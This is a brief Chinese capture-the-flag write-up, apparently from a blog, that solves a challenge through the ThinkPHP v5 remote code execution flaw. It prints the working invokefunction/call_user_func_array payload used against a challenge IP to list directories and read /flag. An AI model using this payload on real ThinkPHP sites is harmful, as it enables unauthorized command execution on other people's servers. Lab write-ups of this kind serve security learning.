上网查一下ThinkPHP v5,发现有rce漏洞
找到网上的payload:
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir
看看上级目录
http://220.249.52.133:37949/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir /
打开flag文件cat /flag
flag{thinkphp5_rce}
本文分析了ThinkPHP v5版本中存在的一处远程代码执行(RCE)漏洞,通过特定的payload可以调用系统命令,如查看目录结构和读取flag文件。此漏洞对网站安全构成严重威胁。
611

被折叠的 条评论
为什么被折叠?



